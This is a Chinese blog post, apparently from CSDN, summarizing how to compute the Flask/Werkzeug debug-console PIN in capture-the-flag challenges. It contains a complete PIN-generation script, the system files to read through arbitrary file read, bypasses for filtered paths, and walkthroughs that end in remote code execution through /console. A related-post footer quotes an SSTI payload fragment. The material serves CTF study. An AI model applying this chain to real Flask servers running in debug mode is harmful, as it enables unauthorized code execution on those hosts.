关于ctf中flask算pin总结

已于 2023-02-21 12:36:33 修改
阅读量4.9k 收藏 41
点赞数 8
分类专栏: CTF-WEB 文章标签: flask python 后端 网络安全
于 2023-02-20 20:07:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35782055/article/details/129126825
版权

什么是pin码

pin码是flask在开启debug模式下,进行代码调试模式所需的进入密码,需要正确的PIN码才能进入调试模式,可以理解为自带的webshell

pin码如何生成

pin码生成要六要素
1.username 在可以任意文件读的条件下读 /etc/passwd进行猜测
2.modname 默认flask.app
3.appname 默认Flask
4.moddir flask库下app.py的绝对路径,可以通过报错拿到,如传参的时候给个不存在的变量
5.uuidnode mac地址的十进制,任意文件读 /sys/class/net/eth0/address
6.machine_id 机器码 这个待会细说,一般就生成pin码不对就是这错了

在python3.8以后生成的脚本如下

import hashlib
from itertools import chain
probably_public_bits = [
    'app',
    'flask.app',
    'Flask',
    '/usr/local/lib/python3.8/site-packages/flask/app.py' 
]

private_bits = [
    '2485376911915',
    '7265fe765262551a676151a24c02b7b646a18828428b87e35c5482255b121e8f7464b02e50ffe3f1d626f8c05793f49a'# get_machine_id(), /etc/machine-id  /proc/sys/kernel/random/boot_id
]   

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode("utf-8")
    h.update(bit)
h.update(b"cookiesalt")

cookie_name = f"__wzd{h.hexdigest()[:20]}"

# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
num = None
if num is None:
    h.update(b"pinsalt")
    num = f"{int(h.hexdigest(), 16):09d}"[:9]

# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = "-".join(
                num[x : x + group_size].rjust(group_size, "0")
                for x in range(0, len(num), group_size)
            )
            break
    else:
        rv = num

print(rv)

关于machine-id

如果能任意文件读尝试去读取/usr/local/lib/python3.7/site-packages/werkzeug/debug/__init__.py
上面的python版本可以通过报错拿到
去找里面的get_machine-id方法
在这里插入图片描述
可以知道/etc/machine-id/proc/sys/kernel/random/boot_id只要读取到其中一个就break的
然后继续拼接上/proc/self/cgroup下的用正则匹配到的值
其实肉眼也能看出来
那么很明了了
machine-id是又两个值拼接的
下面直接上例题

CTFSHOW801

在这里插入图片描述

probably_public_bits = [
    'root',#读/etc/passwd
    'flask.app',#默认
    'Flask',#默认
    '/usr/local/lib/python3.8/site-packages/flask/app.py' #报错得到
]

然后读网卡
在这里插入图片描述
转十进制
在这里插入图片描述
machine-id
/etc/machine-id读不到,那么就是/proc/sys/kernel/random/boot_id/proc/self/cgroup拼接了
得到machine-id
此处cgroup下读的是docker/后面的那串字符串
在这里插入图片描述
计算pin码得到548-952-682
然后报错或访问/consloe进控制台rce
在这里插入图片描述

过滤相关

本题中没有过滤,那么当过滤了self的时候怎么办呢
也就是/proc/self/cgroup没法用了
其中的self可以用相关进程的pid去替换,其实1就行
在这里插入图片描述
在这里插入图片描述
那么cgroup过滤了呢?
可以考虑mountinfo或者cpuset
在这里插入图片描述
在这里插入图片描述

接下里再看几题吧

HSCSEC-2TH EZFLASK

拿用户
在这里插入图片描述

拿版本
在这里插入图片描述
本题能读到/etc/machine-id
拼接得到
在这里插入图片描述

生成pin码进console

在这里插入图片描述
读不了flag,用环境下的readflag读

丨Arcueid丨
关注
  • 8
    点赞
  • 41
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF之路:关于Flask模板注入
zw05011的博客
01-07 5787
题目 题目叫Simple SSTI 打开网页,显示You need pass in a parameter named flag. SSTI,即服务器端模板注入。
Flask debug 模式生成pin码 + [GYCTF2020]FlaskApp
ShenZ的博客
09-07 3132
ssti的payload还是不太会写… Flask debug 模式生成pin码 计pin所需要的值为: 1.flask所登录的用户名 2.modname 3.getattr(app, “name”, app.class.name) 4.flask库下app.py的绝对路径 5.当前网络的mac地址的十进制数 6.docker机器id 1.flask所登录的用户名 /etc/passwd 找到用户名 {% for c in [].__class__.__base__.__subclasses__()
对一道ctf赛题的详细分析
蚁景网安学院
11-23 835
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客极客技术、信息安全热点安全研究分析等安全相关的技术文章稿件通过并发布还能收获200-800元不等的稿酬0x0...
pin-in-CTF:使用intel pin来求解一部分CTF challenge
05-09
pin-in-CTF 使用intel pin来求解一部分CTF challenges
CTF---Web入门第四题 Forms
weixin_33991727的博客
11-08 172
Forms分值:10 来源: Ph0enix 难度:易 参与人数:4945人 Get Flag:2776人 答题人数:2824人 解题通过率:98% 似乎有人觉得PIN码是不可破解的,让我们证明他是错的。 格式:ctf{} 解题链接: http://ctf5.shiyanbar.com/10/main.php 原题链接:http://www...
【考核】CTF小白入门
wlgbcskzxc679的博客
10-22 87
在尝试将number2=2改为number2=[class]得到(在这一步发现输入不同编码会出现不同的异常报错。1.一句话木马的形式:php <?启动靶机可以看到他要求我们上传number1和number2,在URL上打入即可看到下一个页面。1.在报错页面找到绝对路径(emmm卡住了找不到TT-TT,每天起床再研究研究,今天就先这样吧。一般出现这个界面会要求计pin,查询得知计pin的步骤分为五步。今天写了ErrorFlask的题目。
flaskpin
weixin_63231007的博客
07-13 3777
python flask-pin码介绍 & CTF flask-pin码计的应用
flaskpin码攻击——新版本下pin码的生成方式
qq_42303523的博客
04-17 4162
在打*CTF的时候,一道明显是flaskpin码生成进而RCE的题目卡了半天,最后发现是新版本的flaskpin码生成方式有了一定的改变,这里做一下记录。 我们常用的生成pin码的脚本如下: import hashlib from itertools import chain probably_public_bits = [ 'root',# username 'flask.app',# modname 'Flask',# getattr(app, '__name__', get
[GYCTF2020]FlaskApp--Flask Debug PIN
Mrs_H的博客
12-01 1618
[GYCTF2020]FlaskApp 一.前言 已经很久没有写文章了,最近快要到期末了,事情一天比一天多,没有时间做靶场的题目了。这篇文章想写很久了,事实上在一周前就已经用PIN码的方式做出来了这道题,但是一直没有时间来整理,今天下课来到图书馆翻开自己的截图记录就想着把它写出来了。 二.正文 首先,打开题目,来看这个页面 ...
ctf flask如何pin
最新发布
05-04
CTF,有时会遇到需要计pin码的情况。具体计pin码的方法取决于题目的要求和给出的信息。一般来说,计pin码可能涉及到密码学、逆向工程等知识。 如果你能提供更具体的题目信息或要求,我可以给你提供更详细...
[GYCTF2020]FlaskApp 1(SSTI,PIN
weixin_45577185的博客
10-20 1286
f12发现了提示,但是我对PIN没有了解所以没反应过来 扫了一下网站,发现了一个网站打开 非预期解: 本题存在SSTI注入 加密 {{7+7}} e3s3Kzd9fQ== 解密 回显14 说明是SSTI python-Flask模版注入攻击SSTI(python沙盒逃逸) 查看根目录: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init_
【WEB安全】flask不出网回显方式
HBohan的博客
11-06 819
前言 研究这个问题主要是打比赛的时候遇到了,题目内容大概是这样的【查看资料】 # app.py from flask import Flask, request, session, render_template_string, url_for, redirect import pickle import io import sys import base64 import random import subprocess from config import notadmin app = Flask(_
[CTF]2022美团CTF WEB WP
Sapphire037的博客
09-18 3592
2022美团CTF的WEB方向Write up
浅谈Flask Pin
mr_xioabai的博客
08-02 369
每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_id,docker靶机则读取/proc/self/cgroup,其第一行的/docker/字符串后面的内容作为机器的id,在非docker环境下读取后两个,非docker环境三个都需要读取。通过uuid.getnode()读取,通过文件/sys/class/net/eth0/address得到16进制结果,转化为10进制进行计。将其十六进制转为十进制。
深入浅出Flask PIN
蚁景网安学院
08-01 735
最近搞SSTI,发现有的开发开了debug,由此想到了PIN,但一直没有对这个点做一个深入剖析,今天就完整的整理Flask Debug PIN码的生成原理与安全问题。
Flask debug 模式 PIN 码获取
火柴人的博客
03-30 2311
本文由一道CTF题讲解。 [GYCTF2020]FlaskApp(BUUCTF有原题) 讲解 PIN 机制在 Flask debug 模式 PIN 码生成机制安全性研究笔记 一文有详细的研究。 由官方write up总结出,生成PIN的关键值有如下几个: 服务器运行flask所登录的用户名。 通过/etc/passwd可以猜测为flaskweb 或者root ,此处用的flaskweb {...
Flask debug模式pin
遇事不决冲冲冲
03-21 5353
## 什么是PINpin码也就是flask在开启debug模式下,进行代码调试模式的进入密码,需要正确的PIN码才能进入调试模式 ## 如何生成 这里就列一个了,前面全是获取值,最后进行加密,版本不同区别也就就是3.6与3.8的MD5加密和sha1加密不同
Polar flask_pin
Jay17的博客
02-19 530
Polar flask_pin
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值